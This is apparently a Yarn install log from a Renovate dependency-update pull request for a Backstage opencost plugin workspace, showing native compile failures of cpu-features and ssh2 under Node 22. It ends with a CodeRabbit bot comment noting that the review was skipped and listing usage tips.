➤ YN0000: │ cpu-features@npm:0.0.9 STDOUT ar crs Release/obj.target/deps/cpu_features/cpu_features.a @Release/obj.target/deps/cpu_features/cpu_features.a.ar-file-list
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0000: └ Completed in 0s 547ms
➤ YN0000: │ cpu-features@npm:0.0.9 STDOUT   COPY Release/cpu_features.a
➤ YN0000: │ cpu-features@npm:0.0.9 STDOUT   CXX(target) Release/obj.target/cpufeatures/src/binding.o
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0000: Done with warnings in 1s 222ms
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR In file included from ../src/binding.cc:3:
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR ../../nan/nan.h: In function ‘void Nan::SetAccessor(v8::Local<v8::ObjectTemplate>, v8::Local<v8::String>, GetterCallback, SetterCallback, v8::Local<v8::Value>, v8::AccessControl, v8::PropertyAttribute, imp::Sig)’:
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR ../../nan/nan.h:2548:19: error: no matching function for call to ‘v8::ObjectTemplate::SetAccessor(v8::Local<v8::String>&, void (*&)(v8::Local<v8::Name>, const v8::PropertyCallbackInfo<v8::Value>&), void (*&)(v8::Local<v8::Name>, v8::Local<v8::Value>, const v8::PropertyCallbackInfo<void>&), v8::Local<v8::Object>&, v8::AccessControl&, v8::PropertyAttribute&)’
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  2548 |   tpl->SetAccessor(
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |   ~~~~~~~~~~~~~~~~^
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  2549 |       name
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |       ~~~~         
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  2550 |     , getter_
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |     ~~~~~~~~~      
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  2551 |     , setter_
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |     ~~~~~~~~~      
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  2552 |     , obj
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |     ~~~~~          
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  2553 |     , settings
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |     ~~~~~~~~~~     
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  2554 |     , attribute
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |     ~~~~~~~~~~~    
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  2555 | #if (NODE_MODULE_VERSION < NODE_16_0_MODULE_VERSION)
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  2556 |     , signature
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |     ~~~~~~~~~~~    
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  2557 | #endif
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       | ~~~~~~             
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  2558 |   );
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |   ~                
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR In file included from /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8-function.h:15,
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR                  from /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8.h:33,
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR                  from /home/ubuntu/.cache/node-gyp/22.13.1/include/node/node.h:73,
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR                  from ../src/binding.cc:1:
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8-template.h:1049:8: note: candidate: ‘void v8::ObjectTemplate::SetAccessor(v8::Local<v8::String>, v8::AccessorGetterCallback, v8::AccessorSetterCallback, v8::Local<v8::Value>, v8::PropertyAttribute, v8::SideEffectType, v8::SideEffectType)’
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  1049 |   void SetAccessor(
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |        ^~~~~~~~~~~
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8-template.h:1052:61: note:   no known conversion for argument 5 from ‘v8::AccessControl’ to ‘v8::PropertyAttribute’
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  1052 |       Local<Value> data = Local<Value>(), PropertyAttribute attribute = None,
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |                                           ~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8-template.h:1055:8: note: candidate: ‘void v8::ObjectTemplate::SetAccessor(v8::Local<v8::Name>, v8::AccessorNameGetterCallback, v8::AccessorNameSetterCallback, v8::Local<v8::Value>, v8::PropertyAttribute, v8::SideEffectType, v8::SideEffectType)’
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  1055 |   void SetAccessor(
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |        ^~~~~~~~~~~
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8-template.h:1058:61: note:   no known conversion for argument 5 from ‘v8::AccessControl’ to ‘v8::PropertyAttribute’
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  1058 |       Local<Value> data = Local<Value>(), PropertyAttribute attribute = None,
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |                                           ~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR ../../nan/nan.h: In function ‘void Nan::SetAccessor(v8::Local<v8::ObjectTemplate>, v8::Local<v8::String>, GetterCallback, SetterCallback, v8::Local<v8::Value>, v8::AccessControl, v8::PropertyAttribute)’:
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR ../../nan/nan.h:2594:19: error: no matching function for call to ‘v8::ObjectTemplate::SetAccessor(v8::Local<v8::String>&, void (*&)(v8::Local<v8::Name>, const v8::PropertyCallbackInfo<v8::Value>&), void (*&)(v8::Local<v8::Name>, v8::Local<v8::Value>, const v8::PropertyCallbackInfo<void>&), v8::Local<v8::Object>&, v8::AccessControl&, v8::PropertyAttribute&)’
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  2594 |   tpl->SetAccessor(
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |   ~~~~~~~~~~~~~~~~^
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  2595 |       name
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |       ~~~~         
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  2596 |     , getter_
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |     ~~~~~~~~~      
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  2597 |     , setter_
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |     ~~~~~~~~~      
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  2598 |     , obj
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |     ~~~~~          
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  2599 |     , settings
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |     ~~~~~~~~~~     
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  2600 |     , attribute
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |     ~~~~~~~~~~~    
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  2601 |   );
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |   ~                
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8-template.h:1049:8: note: candidate: ‘void v8::ObjectTemplate::SetAccessor(v8::Local<v8::String>, v8::AccessorGetterCallback, v8::AccessorSetterCallback, v8::Local<v8::Value>, v8::PropertyAttribute, v8::SideEffectType, v8::SideEffectType)’
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  1049 |   void SetAccessor(
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |        ^~~~~~~~~~~
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8-template.h:1052:61: note:   no known conversion for argument 5 from ‘v8::AccessControl’ to ‘v8::PropertyAttribute’
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  1052 |       Local<Value> data = Local<Value>(), PropertyAttribute attribute = None,
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |                                           ~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8-template.h:1055:8: note: candidate: ‘void v8::ObjectTemplate::SetAccessor(v8::Local<v8::Name>, v8::AccessorNameGetterCallback, v8::AccessorNameSetterCallback, v8::Local<v8::Value>, v8::PropertyAttribute, v8::SideEffectType, v8::SideEffectType)’
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  1055 |   void SetAccessor(
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |        ^~~~~~~~~~~
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8-template.h:1058:61: note:   no known conversion for argument 5 from ‘v8::AccessControl’ to ‘v8::PropertyAttribute’
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  1058 |       Local<Value> data = Local<Value>(), PropertyAttribute attribute = None,
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |                                           ~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR ../src/binding.cc: At global scope:
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR /home/ubuntu/.cache/node-gyp/22.13.1/include/node/node.h:1226:7: warning: cast between incompatible function types from ‘void (*)(Nan::ADDON_REGISTER_FUNCTION_ARGS_TYPE)’ {aka ‘void (*)(v8::Local<v8::Object>)’} to ‘node::addon_register_func’ {aka ‘void (*)(v8::Local<v8::Object>, v8::Local<v8::Value>, void*)’} [-Wcast-function-type]
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  1226 |       (node::addon_register_func) (regfunc),                          \
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR /home/ubuntu/.cache/node-gyp/22.13.1/include/node/node.h:1260:3: note: in expansion of macro ‘NODE_MODULE_X’
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR  1260 |   NODE_MODULE_X(modname, regfunc, NULL, 0)  // NOLINT (readability/null_usage)
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       |   ^~~~~~~~~~~~~
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR ../src/binding.cc:151:1: note: in expansion of macro ‘NODE_MODULE’
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR   151 | NODE_MODULE(cpufeatures, init)
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR       | ^~~~~~~~~~~
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR make: *** [cpufeatures.target.mk:121: Release/obj.target/cpufeatures/src/binding.o] Error 1
➤ YN0000: │ cpu-features@npm:0.0.9 STDOUT make: Leaving directory '/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/cpu-features/build'
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp ERR! build error 
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp ERR! stack Error: `make` failed with exit code: 2
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp ERR! stack at ChildProcess.<anonymous> (/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/node-gyp/lib/build.js:209:23)
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp ERR! System Linux 6.1.128-136.201.amzn2023.x86_64
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp ERR! command "/opt/containerbase/tools/node/22.13.1/bin/node" "/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/node-gyp/bin/node-gyp.js" "rebuild"
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp ERR! cwd /tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/cpu-features
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp ERR! node -v v22.13.1
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp ERR! node-gyp -v v10.1.0
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp ERR! not ok 
➤ YN0009: │ cpu-features@npm:0.0.9 couldn't be built successfully (exit code 1, logs can be found here: /tmp/xfs-a809e408/build.log)
➤ YN0007: │ @openapitools/openapi-generator-cli@npm:2.13.1 must be built because it never has been before or the last one failed
➤ YN0007: │ ssh2@npm:1.15.0 must be built because it never has been before or the last one failed
➤ YN0000: │ @openapitools/openapi-generator-cli@npm:2.13.1 STDERR (node:852434) [DEP0040] DeprecationWarning: The `punycode` module is deprecated. Please use a userland alternative instead.
➤ YN0000: │ @openapitools/openapi-generator-cli@npm:2.13.1 STDERR (Use `node --trace-deprecation ...` to show where the warning was created)
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info it worked if it ends with ok
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info using [email protected]
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info using [email protected] | linux | x64
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info find Python using Python version 3.13.2 found at "/opt/containerbase/tools/python/3.13.2/bin/python3"
➤ YN0000: │ ssh2@npm:1.15.0 STDOUT 
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn /opt/containerbase/tools/python/3.13.2/bin/python3
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args [
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args '/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/node-gyp/gyp/gyp_main.py',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args 'binding.gyp',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args '-f',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args 'make',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args '-I',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args '/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/ssh2/lib/protocol/crypto/build/config.gypi',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args '-I',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args '/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/node-gyp/addon.gypi',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args '-I',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args '/home/ubuntu/.cache/node-gyp/22.13.1/include/node/common.gypi',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args '-Dlibrary=shared_library',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args '-Dvisibility=default',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args '-Dnode_root_dir=/home/ubuntu/.cache/node-gyp/22.13.1',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args '-Dnode_gyp_dir=/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/node-gyp',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args '-Dnode_lib_file=/home/ubuntu/.cache/node-gyp/22.13.1/<(target_arch)/node.lib',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args '-Dmodule_root_dir=/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/ssh2/lib/protocol/crypto',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args '-Dnode_engine=v8',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args '--depth=.',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args '--no-parallel',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args '--generator-output',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args 'build',
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args '-Goutput_dir=.'
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args ]
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn make
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp info spawn args [ 'BUILDTYPE=Release', '-C', 'build' ]
➤ YN0000: │ ssh2@npm:1.15.0 STDOUT make: Entering directory '/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/ssh2/lib/protocol/crypto/build'
➤ YN0000: │ ssh2@npm:1.15.0 STDOUT   CXX(target) Release/obj.target/sshcrypto/src/binding.o
➤ YN0000: │ ssh2@npm:1.15.0 STDERR In file included from ../src/binding.cc:16:
➤ YN0000: │ ssh2@npm:1.15.0 STDERR ../../../../../nan/nan.h: In function ‘void Nan::SetAccessor(v8::Local<v8::ObjectTemplate>, v8::Local<v8::String>, GetterCallback, SetterCallback, v8::Local<v8::Value>, v8::AccessControl, v8::PropertyAttribute, imp::Sig)’:
➤ YN0000: │ ssh2@npm:1.15.0 STDERR ../../../../../nan/nan.h:2548:19: error: no matching function for call to ‘v8::ObjectTemplate::SetAccessor(v8::Local<v8::String>&, void (*&)(v8::Local<v8::Name>, const v8::PropertyCallbackInfo<v8::Value>&), void (*&)(v8::Local<v8::Name>, v8::Local<v8::Value>, const v8::PropertyCallbackInfo<void>&), v8::Local<v8::Object>&, v8::AccessControl&, v8::PropertyAttribute&)’
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  2548 |   tpl->SetAccessor(
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |   ~~~~~~~~~~~~~~~~^
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  2549 |       name
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |       ~~~~         
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  2550 |     , getter_
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |     ~~~~~~~~~      
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  2551 |     , setter_
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |     ~~~~~~~~~      
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  2552 |     , obj
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |     ~~~~~          
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  2553 |     , settings
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |     ~~~~~~~~~~     
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  2554 |     , attribute
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |     ~~~~~~~~~~~    
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  2555 | #if (NODE_MODULE_VERSION < NODE_16_0_MODULE_VERSION)
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  2556 |     , signature
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |     ~~~~~~~~~~~    
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  2557 | #endif
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       | ~~~~~~             
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  2558 |   );
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |   ~                
➤ YN0000: │ ssh2@npm:1.15.0 STDERR In file included from /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8-function.h:15,
➤ YN0000: │ ssh2@npm:1.15.0 STDERR                  from /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8.h:33,
➤ YN0000: │ ssh2@npm:1.15.0 STDERR                  from /home/ubuntu/.cache/node-gyp/22.13.1/include/node/node.h:73,
➤ YN0000: │ ssh2@npm:1.15.0 STDERR                  from ../src/binding.cc:14:
➤ YN0000: │ ssh2@npm:1.15.0 STDERR /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8-template.h:1049:8: note: candidate: ‘void v8::ObjectTemplate::SetAccessor(v8::Local<v8::String>, v8::AccessorGetterCallback, v8::AccessorSetterCallback, v8::Local<v8::Value>, v8::PropertyAttribute, v8::SideEffectType, v8::SideEffectType)’
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  1049 |   void SetAccessor(
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |        ^~~~~~~~~~~
➤ YN0000: │ ssh2@npm:1.15.0 STDERR /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8-template.h:1052:61: note:   no known conversion for argument 5 from ‘v8::AccessControl’ to ‘v8::PropertyAttribute’
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  1052 |       Local<Value> data = Local<Value>(), PropertyAttribute attribute = None,
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |                                           ~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~
➤ YN0000: │ ssh2@npm:1.15.0 STDERR /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8-template.h:1055:8: note: candidate: ‘void v8::ObjectTemplate::SetAccessor(v8::Local<v8::Name>, v8::AccessorNameGetterCallback, v8::AccessorNameSetterCallback, v8::Local<v8::Value>, v8::PropertyAttribute, v8::SideEffectType, v8::SideEffectType)’
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  1055 |   void SetAccessor(
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |        ^~~~~~~~~~~
➤ YN0000: │ ssh2@npm:1.15.0 STDERR /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8-template.h:1058:61: note:   no known conversion for argument 5 from ‘v8::AccessControl’ to ‘v8::PropertyAttribute’
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  1058 |       Local<Value> data = Local<Value>(), PropertyAttribute attribute = None,
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |                                           ~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~
➤ YN0000: │ ssh2@npm:1.15.0 STDERR ../../../../../nan/nan.h: In function ‘void Nan::SetAccessor(v8::Local<v8::ObjectTemplate>, v8::Local<v8::String>, GetterCallback, SetterCallback, v8::Local<v8::Value>, v8::AccessControl, v8::PropertyAttribute)’:
➤ YN0000: │ ssh2@npm:1.15.0 STDERR ../../../../../nan/nan.h:2594:19: error: no matching function for call to ‘v8::ObjectTemplate::SetAccessor(v8::Local<v8::String>&, void (*&)(v8::Local<v8::Name>, const v8::PropertyCallbackInfo<v8::Value>&), void (*&)(v8::Local<v8::Name>, v8::Local<v8::Value>, const v8::PropertyCallbackInfo<void>&), v8::Local<v8::Object>&, v8::AccessControl&, v8::PropertyAttribute&)’
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  2594 |   tpl->SetAccessor(
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |   ~~~~~~~~~~~~~~~~^
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  2595 |       name
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |       ~~~~         
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  2596 |     , getter_
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |     ~~~~~~~~~      
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  2597 |     , setter_
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |     ~~~~~~~~~      
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  2598 |     , obj
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |     ~~~~~          
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  2599 |     , settings
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |     ~~~~~~~~~~     
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  2600 |     , attribute
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |     ~~~~~~~~~~~    
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  2601 |   );
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |   ~                
➤ YN0000: │ ssh2@npm:1.15.0 STDERR /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8-template.h:1049:8: note: candidate: ‘void v8::ObjectTemplate::SetAccessor(v8::Local<v8::String>, v8::AccessorGetterCallback, v8::AccessorSetterCallback, v8::Local<v8::Value>, v8::PropertyAttribute, v8::SideEffectType, v8::SideEffectType)’
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  1049 |   void SetAccessor(
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |        ^~~~~~~~~~~
➤ YN0000: │ ssh2@npm:1.15.0 STDERR /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8-template.h:1052:61: note:   no known conversion for argument 5 from ‘v8::AccessControl’ to ‘v8::PropertyAttribute’
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  1052 |       Local<Value> data = Local<Value>(), PropertyAttribute attribute = None,
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |                                           ~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~
➤ YN0000: │ ssh2@npm:1.15.0 STDERR /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8-template.h:1055:8: note: candidate: ‘void v8::ObjectTemplate::SetAccessor(v8::Local<v8::Name>, v8::AccessorNameGetterCallback, v8::AccessorNameSetterCallback, v8::Local<v8::Value>, v8::PropertyAttribute, v8::SideEffectType, v8::SideEffectType)’
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  1055 |   void SetAccessor(
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |        ^~~~~~~~~~~
➤ YN0000: │ ssh2@npm:1.15.0 STDERR /home/ubuntu/.cache/node-gyp/22.13.1/include/node/v8-template.h:1058:61: note:   no known conversion for argument 5 from ‘v8::AccessControl’ to ‘v8::PropertyAttribute’
➤ YN0000: │ ssh2@npm:1.15.0 STDERR  1058 |       Local<Value> data = Local<Value>(), PropertyAttribute attribute = None,
➤ YN0000: │ ssh2@npm:1.15.0 STDERR       |                                           ~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~
➤ YN0000: │ ssh2@npm:1.15.0 STDERR make: *** [sshcrypto.target.mk:116: Release/obj.target/sshcrypto/src/binding.o] Error 1
➤ YN0000: │ ssh2@npm:1.15.0 STDOUT make: Leaving directory '/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/ssh2/lib/protocol/crypto/build'
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp ERR! build error 
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp ERR! stack Error: `make` failed with exit code: 2
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp ERR! stack at ChildProcess.<anonymous> (/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/node-gyp/lib/build.js:209:23)
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp ERR! System Linux 6.1.128-136.201.amzn2023.x86_64
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp ERR! command "/opt/containerbase/tools/node/22.13.1/bin/node" "/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/node-gyp/bin/node-gyp.js" "--target=v22.13.1" "--real_openssl_major=3" "rebuild"
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp ERR! cwd /tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/ssh2/lib/protocol/crypto
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp ERR! node -v v22.13.1
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp ERR! node-gyp -v v10.1.0
➤ YN0000: │ ssh2@npm:1.15.0 STDERR gyp ERR! not ok 
➤ YN0000: │ ssh2@npm:1.15.0 STDOUT Failed to build optional crypto binding
➤ YN0000: └ Completed in 26s 936ms
➤ YN0000: Failed with errors in 28s 394ms

Copy link

coderabbitai bot commented Mar 9, 2025

Important

Review skipped

Bot user detected.

To trigger a single review, invoke the @coderabbitai review command.

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.


Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share
🪧 Tips

Chat

There are 3 ways to chat with CodeRabbit:

  • Review comments: Directly reply to a review comment made by CodeRabbit. Example:
    • I pushed a fix in commit <commit_id>, please review it.
    • Generate unit testing code for this file.
    • Open a follow-up GitHub issue for this discussion.
  • Files and specific lines of code (under the "Files changed" tab): Tag @coderabbitai in a new review comment at the desired location with your query. Examples:
    • @coderabbitai generate unit testing code for this file.
    • @coderabbitai modularize this function.
  • PR comments: Tag @coderabbitai in a new PR comment to ask questions about the PR branch. For the best results, please provide a very specific query, as very limited context is provided in this mode. Examples:
